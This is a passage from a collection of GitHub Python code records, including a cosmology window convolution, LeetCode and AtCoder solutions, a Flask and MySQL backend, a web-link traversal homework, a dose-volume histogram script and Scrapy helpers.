np.logspace(np.log10(k.min()), np.log10(k.max()), 500)\n poles_hires = []\n for i in range(Nell):\n tck = interp.splrep(k, Pell[:,i], k=3, s=0)\n poles_hires.append(interp.splev(k_hires, tck))\n Pell = np.vstack(poles_hires).T\n k = k_hires.copy()\n\n # FT the power multipoles\n xi = np.empty((len(s), Nell))\n for i, ell in enumerate(ells):\n xi[:,i] = pygcl.pk_to_xi(int(ell), k, Pell[:,i], s, smoothing=0., method=pygcl.IntegrationMethods.TRAPZ)\n\n # convolve the config space multipole\n if dry_run:\n xi_conv = xi.copy()\n else:\n xi_conv = convolver(ells, s, xi, order='F')\n\n # FT back to get convolved power pole\n toret = np.empty((len(k_out), Nell))\n for i, ell in enumerate(ells):\n toret[:,i] = pygcl.xi_to_pk(int(ell), s, xi_conv[:,i], k_out[:,i], smoothing=0., method=pygcl.IntegrationMethods.TRAPZ)\n\n return k_out[:,0], toret\n","repo_name":"nickhand/pyRSD","sub_path":"pyRSD/rsd/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":9557,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"60"} +{"seq_id":"1224096900","text":"import sys\r\n\r\ns, k = sys.stdin.read().split()\r\nk = int(k)\r\n\r\n\r\ndef main():\r\n res = set()\r\n for i in range(len(s) - k + 1):\r\n res.add(s[i : i + k])\r\n return len(res)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ans = main()\r\n print(ans)\r\n","repo_name":"kagemeka/atcoder-submissions","sub_path":"jp.atcoder/abc032/abc032_b/8933901.py","file_name":"8933901.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"25153863292","text":"import os\nfrom pathlib import Path\nfrom typing import Union\n\nimport cv2\nimport numpy as np\nimport torch\nfrom PIL import Image\n\n\ndef read_rgb(file_path: Union[str, Path], engine: str = \"pil\") -> np.array: # type: ignore\n \"\"\"Load an image from file_path as a numpy array.\n\n Args:\n file_path (Union[str, Path]): path to image\n engine (str, optional): image loading engine. Defaults to \"pil\".\n\n Raises:\n FileNotFoundError: if file is not found\n\n Returns:\n np.array: image\n \"\"\"\n if engine not in [\"pil\", \"cv2\"]:\n print(f\"[WARNING] Loading image engine {engine} is not supported. 
Using PIL instead.\")\n engine = \"pil\"\n\n if not os.path.exists(file_path):\n raise FileNotFoundError(f\"The path {file_path} does not exist\")\n\n if engine == \"pil\":\n image = Image.open(file_path).convert(\"RGB\")\n image = np.array(image)\n else:\n image = cv2.imread(file_path) # type: ignore\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n return image\n\n\ndef save_image(image: np.array, output_path: Union[Path, str]) -> None: # type: ignore\n \"\"\"Save an image at given path making sure the folder exists.\n\n Args:\n image (np.array): image to save\n output_path (Union[Path, str]): output path\n \"\"\"\n output_dir = output_path.replace(os.path.basename(output_path), \"\") # type: ignore\n os.makedirs(output_dir, exist_ok=True)\n\n if len(image.shape) > 2: # type: ignore\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n try:\n cv2.imwrite(output_path, image) # type: ignore\n except Exception as e:\n print(f\"[ERROR] While saving image at path {output_path} an error occurred - {e}\")\n\n\ndef resize_rgb(image: np.array, w: int, h: int) -> np.array: # type: ignore\n \"\"\"Resize image to w x h.\n\n Args:\n image (np.array): image\n w (int): width\n h (int): height\n\n Returns:\n np.array: resized image\n \"\"\"\n image = cv2.resize(image, (w, h))\n return image\n","repo_name":"riccardomusmeci/tocla","sub_path":"src/tocla/io/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"3009829030","text":"\"\"\"Create a list of products for an online store. Serialize it with pickle and save it to JSON.\"\"\"\n\nimport json\nimport pickle\n\ntry:\n products = pickle.load(open('products.p', 'rb'))\nexcept (EOFError, IOError):\n print('Cannot open pickled file or file does not exist. Creating new product list')\n products = []\n\n\ndef add_product(_name, _code, _description):\n product = dict(name=_name, code=_code, description=_description)\n products.append(product)\n\n\ndef print_products():\n print('-'*10 + 'Products' + '-'*10)\n for product in products:\n print(product['name'] + ' - ' + product['code'] + ' - ' + product['description'])\n print('-'*28)\n\n\ndef save():\n pickle.dump(products, open('products.p', 'wb'))\n json.dump(products, open('products.json', 'w', encoding=\"utf8\"))\n\n\ndef on_exit():\n choice = input('Do you want to save changes? (Y/N)\\n>>').lower()\n if choice == 'y':\n save()\n else:\n pass\n\n\nif __name__ == '__main__':\n while True:\n variant = input('1.Add new product''\\n'\n '2.Save''\\n'\n '3.Print products''\\n'\n '4.Exit''\\n'\n '>> ')\n if variant == '1':\n try:\n name = input('name: ')\n code = input('code: ')\n desc = input('description: ')\n add_product(name, code, desc)\n except Exception as e:\n print('Error occurred: ' + str(e))\n if variant == '2':\n save()\n if variant == '3':\n print_products()\n if variant == '4':\n on_exit()\n break\n","repo_name":"ADV90/ITVDN","sub_path":"PythonEssential/HomeWork_09/HW_93.py","file_name":"HW_93.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"7274743489","text":"from random import randint\n\n\nEASY_LEVEL_TURNS = 10\nHARD_LEVEL_TURNS = 5\n\n\n# function to check user's guess against the answer\ndef check_answer(guess, answer, turns):\n \"\"\" checks answer against guess. 
Returns the number of turns remaining\"\"\"\n if guess > answer:\n print(\"Too high.\")\n return turns - 1\n elif guess < answer:\n print(\"Too low.\")\n return turns - 1\n else:\n print(f\"You got it! The answer was {answer}\")\n\n\n# make function to set difficulty\ndef set_difficulty():\n level = input(\"Choose a difficulty. Type 'easy' or 'hard': \").lower()\n if level == \"easy\":\n return EASY_LEVEL_TURNS\n else:\n return HARD_LEVEL_TURNS\n\n\ndef game():\n # choosing random number between 1 and 100\n print(\"Welcome to the Number Guessing Game.\\nI'm thinking of a number between 1 and 100.\")\n answer = randint(1,100)\n\n turns = set_difficulty()\n \n # repeat the guessing functionality if they guess wrong\n guess = 0\n while guess != answer:\n print(f\"You have {turns} attempts remaining to guess the number.\")\n # let user guess the number\n guess = int(input(\"Make a guess: \"))\n turns = check_answer(guess, answer, turns)\n\n if turns == 0:\n print(\"You're out of guesses, you lose\")\n return\n elif guess != answer:\n print(\"Guess again.\")\n\ngame()","repo_name":"M74-dot/100_days_of_python","sub_path":"day_11/number_guessing.py","file_name":"number_guessing.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28119238663","text":"# 338. Counting Bits\n# Given an integer n, return an array ans of length n + 1\n# such that for each i (0 <= i <= n), ans[i] is\n# the number of 1's in the binary representation of i.\ndef countBits(n: int):\n dp = [0]\n for i in range(1, n + 1):\n if i % 2 == 1:\n dp.append(dp[i - 1] + 1)\n else:\n dp.append(dp[i // 2])\n\n return dp\n\n\n# 118. Pascal's Triangle\n# Given an integer numRows, return the first numRows of Pascal's triangle.\n# Input: numRows = 5\n# Output: [[1],[1,1],[1,2,1],[1,3,3,1],[1,4,6,4,1]]\n\n\ndef generate_pascal_triangle(numRows: int):\n dp = [[1]]\n for i in range(1, numRows):\n tmp = [1]\n for j in range(1, i):\n tmp.append(dp[i - 1][j - 1] + dp[i - 1][j])\n tmp.append(1)\n dp.append(tmp)\n\n return dp\n\n\n# 509. Fibonacci Number\n# The Fibonacci numbers, commonly denoted F(n) form a sequence, called the Fibonacci sequence,\n# such that each number is the sum of the two preceding ones, starting from 0 and 1. That is,\n# F(0) = 0, F(1) = 1\n# F(n) = F(n - 1) + F(n - 2), for n > 1.\n# Given n, calculate F(n).\ndef fib(n: int):\n dp = [0, 1]\n for i in range(2, n + 1):\n dp.append(dp[i - 1] + dp[i - 2])\n return dp[n]\n\n\ndef fib_rec(n: int):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fib_rec(n - 1) + fib_rec(n - 2)\n\n\n# 1137. N-th Tribonacci Number\ndef tribonacci(n: int):\n dp = [0, 1, 1]\n for i in range(3, n + 1):\n dp.append(dp[i - 1] + dp[i - 2] + dp[i - 3])\n return dp[n]\n\n\n# 121. Best Time to Buy and Sell Stock\n# You are given an array prices where prices[i] is the price of a given stock on the ith day.\n# You want to maximize your profit by choosing a single day to buy one stock\n# and choosing a different day in the future to sell that stock.\n# Return the maximum profit you can achieve from this transaction. If you cannot achieve any profit, return 0.\n\n\ndef maxProfit(prices):\n dp = [0] * (len(prices))\n hold = prices[0]\n for i in range(1, len(prices)):\n if prices[i] < hold:\n hold = prices[i]\n\n dp[i] = max(dp[i - 1], prices[i] - hold)\n return dp[-1]\n\n\n# 70. Climbing Stairs\n# You are climbing a staircase. 
It takes n steps to reach the top.\n# Each time you can either climb 1 or 2 steps. In how many distinct ways can you climb to the top?\ndef climbStairs(n: int):\n dp = [0, 1, 2]\n for i in range(3, n + 1):\n dp.append(dp[i - 1] + dp[i - 2])\n return dp[n]\n\n\n# 746. Min Cost Climbing Stairs\n# You are given an integer array cost where cost[i] is the cost of ith step on a staircase.\n# Once you pay the cost, you can either climb one or two steps.\n# You can either start from the step with index 0, or the step with index 1.\n# Return the minimum cost to reach the top of the floor.\ndef minCostClimbingStairs(cost):\n dp = [0] * len(cost)\n if not cost:\n return 0\n\n dp[0] = cost[0]\n if len(cost) >= 2:\n dp[1] = cost[1]\n\n for i in range(2, len(cost)):\n dp[i] = cost[i] + min(dp[i - 1], dp[i - 2])\n\n return min(dp[-1], dp[-2])\n\n\n# 1646. Get Maximum in Generated Array\n# You are given an integer n. A 0-indexed integer array nums of length n + 1 is generated in the following way:\n# nums[0] = 0\n# nums[1] = 1\n# nums[2 * i] = nums[i] when 2 <= 2 * i <= n\n# nums[2 * i + 1] = nums[i] + nums[i + 1] when 2 <= 2 * i + 1 <= n\n# Return the maximum integer in the array nums​​​.\ndef getMaximumGenerated(n):\n if not n:\n return 0\n dp = [0] * (n + 1)\n dp[1] = 1\n for i in range(2, n + 1):\n if i % 2 == 0:\n dp[i] = dp[i // 2]\n else:\n dp[i] = dp[i // 2] + dp[(i // 2) + 1]\n return max(dp)\n\n\nif __name__ == \"__main__\":\n print(getMaximumGenerated(4))\n","repo_name":"filippzotov/interview-questions","sub_path":"dynamic programming/dp.py","file_name":"dp.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74076836671","text":"import argparse\n\nfrom attrdict import AttrDict\n\nfrom configs.helpers import load_base_config, get_script_parser\n\nif __name__ == '__main__':\n # things we can use from command line\n\n parser = get_script_parser()\n parser.add_argument('--query', type=str, help=\"Filtering key\", default=None)\n parser.add_argument('config', type=str, help=\"common params for all modules.\")\n local_args, unknown = parser.parse_known_args()\n\n params, root = load_base_config(local_args.config, unknown)\n exp_name = root.get_exp_name()\n\n print(\"----------------------- EXPERIMENT -----------------------\")\n print(f\"exp_name = {exp_name}\")\n\n if local_args.query is not None:\n q = params[local_args.query]\n if isinstance(q, AttrDict):\n q_str = q.pprint(ret_string=True, str_max_len=100)\n else:\n q_str = str(q)\n print(f\"params[{local_args.query}]=\" + q_str)\n else:\n # print(\"common_params = \" + params.pprint(ret_string=True, str_max_len=None))\n print(\"params=\" + params.pprint(ret_string=True, str_max_len=100))\n","repo_name":"manasi-sharma/muse","sub_path":"scripts/resolve.py","file_name":"resolve.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24043251064","text":"# James Hale and Kate Kwasny\r\n# Project 2\r\n\r\nimport urllib.request, urllib.parse, urllib.error\r\nfrom collections import deque\r\nvisited = None\r\npath = None\r\ndef byte2str(b):\r\n \"\"\"\r\n Input: byte sequence b of a string\r\n Output: string form of the byte sequence\r\n Required for python 3 functionality\r\n \"\"\"\r\n return \"\".join(chr(a) for a in b)\r\n\r\n\r\ndef getLinks(url, baseurl=\"http://secon.utulsa.edu/cs2123/webtraverse/\"):\r\n \"\"\"\r\n Input: url to visit, Boolean 
absolute indicates whether URLs should include absolute path (default) or not\r\n    Output: list of pairs of URLs and associated text\r\n    \"\"\"\r\n    # import the HTML parser package\r\n try:\r\n from bs4 import BeautifulSoup\r\n except:\r\n print('You must first install the BeautifulSoup package for this code to work')\r\n raise\r\n # fetch the URL and load it into the HTML parser\r\n soup = BeautifulSoup(urllib.request.urlopen(url).read(), features=\"html.parser\")\r\n # pull out the links from the HTML and return\r\n return [baseurl + byte2str(a[\"href\"].encode('ascii', 'ignore')) for a in soup.findAll('a')]\r\n\r\n\r\ndef print_dfs(url):\r\n \"\"\"\r\n Print all links reachable from a starting **url**\r\n in depth-first order\r\n \"\"\"\r\n\r\n global visited\r\n theDict = {url: getLinks(url)}\r\n if visited is None:\r\n visited = set()\r\n visited.add(url)\r\n print(url)\r\n for x in theDict[url]:\r\n if x in visited:\r\n continue\r\n print_dfs(x)\r\n\r\n \"\"\"\r\n theDict = {}\r\n visited, Q = set(), []\r\n Q.append(url)\r\n while Q:\r\n aLink = Q.pop()\r\n if aLink in visited: continue\r\n print (aLink)\r\n visited.add(aLink)\r\n theDict[aLink] = getLinks(aLink)\r\n Q.extend(getLinks(aLink))\r\n \"\"\"\r\n\r\ndef print_bfs(url):\r\n \"\"\"\r\n Print all links reachable from a starting **url**\r\n in breadth-first order\r\n \"\"\"\r\n theDict = {}\r\n visited, Q = set(), deque()\r\n Q.append(url)\r\n while Q:\r\n aLink = Q.popleft()\r\n if aLink in visited: continue\r\n visited.add(aLink)\r\n Q.extend(getLinks(aLink))\r\n theDict[aLink] = getLinks(aLink)\r\n print (aLink)\r\n\r\ndef find_shortest_path(url1, url2):\r\n \"\"\"\r\n Find and return the shortest path\r\n from **url1** to **url2** if one exists.\r\n If no such path exists, say so.\r\n \"\"\"\r\n path = [url2]\r\n P = bfs_parents(url1)\r\n curr = url2\r\n pathExists = True\r\n if url2 in P:\r\n while P[curr] != url1:\r\n if P[curr] is None:\r\n print('Path not found')\r\n pathExists = False\r\n break\r\n else:\r\n path.append(P[curr])\r\n curr = P[curr]\r\n else:\r\n pathExists = False\r\n path.append(url1)\r\n path.reverse()\r\n if pathExists:\r\n for x in path:\r\n print (x)\r\n print(\"*\" * len(path[len(path)-1]))\r\n else:\r\n print (\"No path exists.\")\r\n print(\"*\" * 14)\r\n\r\ndef find_max_depth(start_url):\r\n \"\"\"\r\n Find and return the URL that is the greatest distance from start_url, along with the sequence of links that must be followed to reach the page.\r\n For this problem, distance is defined as the minimum number of links that must be followed from start_url to reach the page.\r\n \"\"\"\r\n theDict = {}\r\n path = []\r\n visited, Q = set(), deque()\r\n Q.append(start_url)\r\n while Q:\r\n aLink = Q.popleft()\r\n if aLink in visited: continue\r\n visited.add(aLink)\r\n Q.extend(getLinks(aLink))\r\n theDict[aLink] = getLinks(aLink)\r\n path.append(aLink)\r\n find_shortest_path(start_url, path.pop())\r\n\r\ndef bfs_parents(url):\r\n theDict = {}\r\n visited, Q = set(), deque()\r\n Q.append(url)\r\n while Q:\r\n aLink = Q.popleft()\r\n if aLink in visited: continue\r\n visited.add(aLink)\r\n Q.extend(getLinks(aLink))\r\n theDict[aLink] = getLinks(aLink)\r\n P, Q = {url: None}, deque()\r\n Q.append(url)\r\n while Q:\r\n aLink = Q.popleft()\r\n for v in theDict[aLink]:\r\n if v in P: continue\r\n P[v] = aLink\r\n Q.append(v)\r\n return P\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n starturl = \"http://secon.utulsa.edu/cs2123/webtraverse/index.html\"\r\n\r\n print(\"*********** (a) Depth-first search 
**********\")\r\n print_dfs(starturl)\r\n\r\n print(\"*********** (b) Breadth-first search **********\")\r\n print_bfs(starturl)\r\n print(\"*********** (c) Find shortest path between two URLs ********\")\r\n find_shortest_path(\"http://secon.utulsa.edu/cs2123/webtraverse/index.html\",\r\n \"http://secon.utulsa.edu/cs2123/webtraverse/wainwright.html\")\r\n find_shortest_path(\"http://secon.utulsa.edu/cs2123/webtraverse/turing.html\",\r\n \"http://secon.utulsa.edu/cs2123/webtraverse/dijkstra.html\")\r\n \r\n\r\n\r\n\r\n print(\"*********** (d) Find the longest shortest path from a starting URL *****\")\r\n find_max_depth(starturl)\r\n\r\n #P = bfs_parents(starturl)\r\n #print(P)\r\n","repo_name":"katekwasny/CS2123","sub_path":"Project2/traverse.py","file_name":"traverse.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1119044233","text":"import time\nimport os\nfrom flask_mysqldb import MySQL\n# import MySQLdb.cursors\nfrom flask import Flask, jsonify, request, render_template\n\napp = Flask(__name__)\nmysql = MySQL(app)\n\napp.config['MYSQL_HOST'] = os.getenv('MYSQL_HOST')\napp.config['MYSQL_USER'] = os.getenv('MYSQL_USER')\napp.config['MYSQL_PASSWORD'] = os.getenv('MYSQL_PASSWORD')\napp.config['MYSQL_DB'] = os.getenv('MYSQL_DB')\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/fetch_db')\ndef fetch_db():\n cursor = mysql.connection.cursor()\n cursor.execute('SELECT * FROM requestsToDate')\n rows = cursor.fetchall()\n cursor.close()\n return jsonify(rows)\n\n@app.route('/requests_to_date')\ndef requests_to_date():\n cursor = mysql.connection.cursor()\n cursor.execute('SELECT SUM(size) FROM requestsToDate')\n result = cursor.fetchone()\n return jsonify(result)\n\n@app.route('/send_to_db', methods=['POST'])\ndef send_to_db():\n print(\"sending to database\")\n packet_size = request.json[\"packetSize\"]\n print(packet_size)\n cursor = mysql.connection.cursor()\n cursor.execute('INSERT INTO requestsToDate (size) VALUES (%s)', (packet_size,))\n cursor.connection.commit()\n cursor.close()\n return jsonify(\"Successfully posted to database\")\n\n@app.route('/time')\ndef get_current_time():\n print(\"fetching current time\")\n current_time = time.strftime(\"%I:%M %p\")\n return {'time': current_time}\n\n\n# @app.route('/socket_test')\n# def socket_test():\n","repo_name":"chart10/OS-4320-term-project","sub_path":"backend/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35783167026","text":"\nMODE = 0\n\ndef norm(imgs, mode = MODE):\n if mode == 0:\n return (imgs.astype('float32') / 127.5) - 1.\n if mode == 1:\n return imgs.astype('float32') / 255.\n if mode == 2:\n return norm_mean_std(imgs)\n \n \ndef un_norm(imgs, mode = MODE):\n if mode == 0:\n return ((imgs + 1.) 
* 127.5).astype('uint8')\n if mode == 1:\n imgs[imgs < 0] = 0\n return (imgs * 255.).astype('uint8')\n if mode == 2:\n return un_norm_mean_std(imgs)\n \n \ndef norm_mean_std(imgs, \n mean=[0.485, 0.456, 0.406], \n std=[0.229, 0.224, 0.225]):\n \n imgs = imgs.astype('float32')\n imgs = imgs / 255.\n \n for c in range(3):\n imgs[:,:,c] = (imgs[:,:,c] - mean[c]) / std[c]\n \n return imgs\n\n\ndef un_norm_mean_std(imgs, \n mean=[0.485, 0.456, 0.406], \n std=[0.229, 0.224, 0.225]):\n \n for c in range(3):\n imgs[:,:,c] = imgs[:,:,c] * std[c] + mean[c]\n \n imgs = imgs * 255.\n imgs = imgs.astype('uint8')\n \n return imgs\n\n","repo_name":"oliblum90/ld_gan","sub_path":"ld_gan/data_proc/norm_img.py","file_name":"norm_img.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"36931409755","text":"# coding=utf-8\n\"\"\"\n\n\"\"\"\nfrom crams_log.log_events import base\nfrom crams_log.utils import lookup_utils\nfrom crams_log.constants import log_actions, log_types\nfrom crams_collection.models import ProjectLog\nfrom crams_contact.models import ContactLog\nfrom crams_collection.serializers import base_project_serializer\n\n\nclass ProjectMetaLogger:\n @classmethod\n def setup_project_log(cls, before_json, after_json, user_obj, project, message, contact=None):\n if not message:\n message = 'Project data updated'\n action = lookup_utils.fetch_log_action(log_actions.UPDATE_FORM, 'Change Project metadata')\n log_type = lookup_utils.fetch_log_type(log_types.Project, 'Project')\n\n log_obj = base.CramsLogModelUtil.create_new_log(before_json, after_json, log_type, action, message, user_obj)\n\n # link to relevant project log\n ProjectLog.link_log(log_obj, project_obj=project)\n if contact:\n ContactLog.link_log(log_obj, crams_contact_obj=contact)\n\n return log_obj\n\n @classmethod\n def build_json(cls, project_obj, context):\n if project_obj:\n sz = base_project_serializer.ReadOnlyProjectSerializer(project_obj, context=context)\n return sz.data\n\n @classmethod\n def log_project_metadata_change(\n cls, project_obj, existing_project_obj, created_by_user_obj, message, contact, sz_context):\n before_json = cls.build_json(existing_project_obj, context=sz_context)\n after_json = cls.build_json(project_obj, context=sz_context)\n return cls.setup_project_log(\n before_json, after_json, created_by_user_obj, project_obj, message, contact)\n","repo_name":"CRAMS-Dashboard/crams-api","sub_path":"crams-apps/crams_collection/crams_collection/log/project_log.py","file_name":"project_log.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"9066485075","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by yetongxue on 2018/1/5 14:58\n\nfrom sqlalchemy import create_engine\nfrom RecruitSpider import settings\nimport hashlib\n\n\n\ndef get_city_pinyin():\n\timport pinyin\n\tsql_str = \"SELECT name FROM city WHERE parent_id <> 0\"\n\tcities_pinyin = []\n\tfor item in execute_sql(sql_str):\n\t\tcities_pinyin.append(pinyin.get(item, format='strip'))\n\tcities_pinyin.remove('zhongqing')\n\tcities_pinyin.append('chongqing')\n\treturn cities_pinyin\n\n\ndef get_job_url_md5():\n\tsql_str=\"SELECT url FROM zhilian_job\"\n\tresult=execute_sql(sql_str)\n\tprocessed_result=[]\n\tfor item in result:\n\t\tprocessed_result.append(get_md5(item))\n\treturn processed_result\n\ndef get_company_md5():\n\tsql_str=\"SELECT 
com_md5 FROM zhilian_company\"\n\tresult=execute_sql(sql_str)\n\treturn result\n\ndef execute_sql(sql_str):\n\tengine = create_engine('mysql://{}:{}@{}:3306/{}?charset=utf8'.format(settings.MYSQL_USER,settings.MYSQL_PASSWORD,settings.MYSQL_HOST,settings.MYSQL_DBNAME), echo=False)\n\tconn = engine.connect()\n\tresult = conn.execute(sql_str)\n\tresult = result.fetchall()\n\tconn.close()\n\tprocessed_result = []\n\tfor item in result:\n\t\tprocessed_result.append(item[0])\n\treturn processed_result\n\n\ndef get_md5(value):\n\tif isinstance(value,str):\n\t\tvalue=value.encode('utf-8')\n\t\tmd5_obj=hashlib.md5()\n\t\tmd5_obj.update(value)\n\t\treturn md5_obj.hexdigest()\n","repo_name":"yexxyy/recruit_data","sub_path":"RecruitSpider/RecruitSpider/tools/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"305999731","text":"import mpld3\nimport numpy as np\nimport sys, os\nfrom vtk import vtkUnstructuredGridReader, vtkUnstructuredGrid, vtkMeshQuality, vtkExtractUnstructuredGrid\nfrom vtk.numpy_interface import dataset_adapter as npi\nfrom math import floor\nfrom matplotlib import pyplot as plt\n\ndef import_data(filePath):\n\n reader = vtkUnstructuredGridReader()\n reader.SetFileName(filePath)\n reader.ReadAllScalarsOn()\n reader.ReadAllVectorsOn()\n reader.Update()\n output = reader.GetOutput()\n\n return output\n\n\ndef populate_dictionary(fluenceData, regionData):\n\n maxFluence = fluenceData.max()\n loopEnd = fluenceData.size\n doseVolumeData = {}\n\n for n in range(loopEnd):\n val = fluenceData[n]\n key = regionData[n]\n if (key == 0): continue\n\n else:\n if key not in doseVolumeData:\n doseVolumeData[key] = []\n\n doseVolumeData[key].append(val)\n\n # for key in doseVolumeData:\n # print(key)\n\n return doseVolumeData\n\n\ndef calculate_DVH(doseData, volumeData, noBins):\n\n maxFluence = 0\n\n for key in doseData:\n regionMax = max(doseData[key])\n if regionMax > maxFluence:\n maxFluence = regionMax\n\n # print(\"Max fluence: \" + str(maxFluence))\n binSize = maxFluence / noBins\n doseVolumeData = {}\n\n for key in doseData:\n\n totalVolume = 0\n doseVolumeData[key] = [0] * noBins\n\n for n in range(len(doseData[key])):\n totalVolume += volumeData[key][n]\n idx = floor(doseData[key][n] / maxFluence * (noBins-1))\n doseVolumeData[key][idx] += volumeData[key][n]\n\n for n in range (len(doseVolumeData[key])):\n doseVolumeData[key][n] /= totalVolume\n\n # for key in doseVolumeData:\n # print(\"Values for region \" + str(key))\n #\n # for val in doseVolumeData[key]:\n # print(val)\n\n return doseVolumeData\n\n\ndef calculate_volumes(fullMonteOutputData, regionData, noCells):\n\n volumeData = {}\n\n for n in range(noCells):\n key = regionData[n]\n if (key == 0): continue\n\n else:\n if key not in volumeData:\n volumeData[key] = []\n\n curCell = fullMonteOutputData.GetCell(n)\n volume = vtkMeshQuality.TetVolume(curCell)\n volumeData[key].append(volume)\n\n return volumeData\n\n\ndef plot_DVH(data, noBins):\n\n SMALL_SIZE = 16\n MEDIUM_SIZE = 18\n LARGE_SIZE = 20\n\n legendList = []\n\n xVals = (np.array(range(noBins)) / noBins * 100)\n\n for key in data:\n yVals = np.array(data[key]) * 100\n plt.plot(xVals[1:-1],yVals[1:-1])\n legendList.append(str(key))\n\n plt.title(\"Cumulative Dose-Volume Histogram\")\n plt.ylabel(\"Relative Volume (% of region volume)\")\n plt.xlabel(\"Relative Dose (% of max fluence)\")\n plt.legend(legendList, loc='upper right', title='Region 
ID')\n\n plt.rc('font', size=SMALL_SIZE) # controls default text sizes\n plt.rc('axes', titlesize=SMALL_SIZE) # fontsize of the axes title\n plt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels\n plt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels\n plt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels\n plt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize\n plt.rc('figure', titlesize=LARGE_SIZE) # fontsize of the figure title\n\n fig = plt.gcf()\n\n return mpld3.fig_to_html(fig)\n\n\ndef calculate_cumulative_DVH(doseVolumeData, noBins):\n\n cumulativeDVH = {}\n\n for key in doseVolumeData:\n\n if key not in cumulativeDVH:\n cumulativeDVH[key] = [0] * noBins;\n\n cumulativeTotal = 0;\n\n for n in range(noBins-1, -1, -1):\n cumulativeTotal += doseVolumeData[key][n]\n cumulativeDVH[key][n] = cumulativeTotal\n\n return cumulativeDVH\n\n\n# regionBoundaries is a 6-entry vector of floating point values\n# This defines the boundaries of the subregion in the order xmin, xmax, ymin, ymax, zmin, zmax\ndef extract_mesh_subregion(mesh,regionBoundaries):\n subregionAlgorithm = vtkExtractUnstructuredGrid()\n subregionAlgorithm.SetInputData(mesh)\n subregionAlgorithm.SetExtent(regionBoundaries)\n subregionAlgorithm.Update()\n return subregionAlgorithm.GetOutput()\n\n\ndef dose_volume_histogram(filePath):\n\n filePath = os.path.dirname(__file__) + filePath\n\n output = import_data(filePath)\n\n ## regionBoundaries = [100, 140, 55, 75, 80, 110] ## Good region for FullMonte_fluence_line mesh\n ## output = extract_mesh_subregion(output, regionBoundaries)\n\n # Arrays are of type numpy.ndarray\n numpyWrapper = npi.WrapDataObject( output )\n\n try:\n fluenceData = numpyWrapper.CellData[\"Fluence\"] # Assuming you know the name of the array\n regionData = numpyWrapper.CellData[\"Region\"]\n\n if (fluenceData.size != regionData.size):\n print(\"Fluence and region data do not match\")\n return(-1)\n\n except AttributeError:\n print(\"Could not parse region or fluence data by name. Attempting to parse by index\")\n\n try:\n regionData = numpyWrapper.CellData[0]\n fluenceData = numpyWrapper.CellData[1] # Assuming you know the number of the array\n\n if (fluenceData.size != regionData.size):\n print(\"Fluence and region data do not match\")\n return(-1)\n\n except IndexError:\n print(\"Could not parse region or fluence data. Input mesh may not be a correctly formatted FullMonte output file.\")\n return(-1)\n\n except:\n print(\"Unidentified error occurred. 
Could not parse input data\")\n return(-2)\n\n\n noBins = 500\n noCells = fluenceData.size\n\n volumeData = calculate_volumes(output,regionData,noCells)\n doseData = populate_dictionary(fluenceData,regionData)\n DVHdata = calculate_DVH(doseData,volumeData,noBins)\n cumulativeDVH = calculate_cumulative_DVH(DVHdata, noBins)\n return plot_DVH(cumulativeDVH,noBins)\n","repo_name":"julian-gonsalves/FullMonteWeb","sub_path":"application/dvh.py","file_name":"dvh.py","file_ext":"py","file_size_in_byte":6008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21708785676","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n# Enable this pipeline via ITEM_PIPELINES in the settings file\n\nfrom datetime import datetime\nfrom sqlalchemy.orm import sessionmaker\nfrom shiyanlou.models import Course,User,engine\nfrom shiyanlou.items import CoursesItem,UserItem\n\nclass ShiyanlouPipeline(object):\n\n # Process each item after it is received\n def process_item(self, item, spider):\n # If the item is a CoursesItem, handle it with _process_course_item\n if isinstance(item,CoursesItem):\n self._process_course_item(item)\n # Otherwise handle it with _process_user_item\n else:\n self._process_user_item(item)\n return item\n \n # Helper functions with the concrete processing steps\n def _process_course_item(self,item):\n item['students'] = int(item['students'])\n self.session.add(Course(**item))\n\n def _process_user_item(self,item):\n item['level'] = int(item['level'][1:])\n 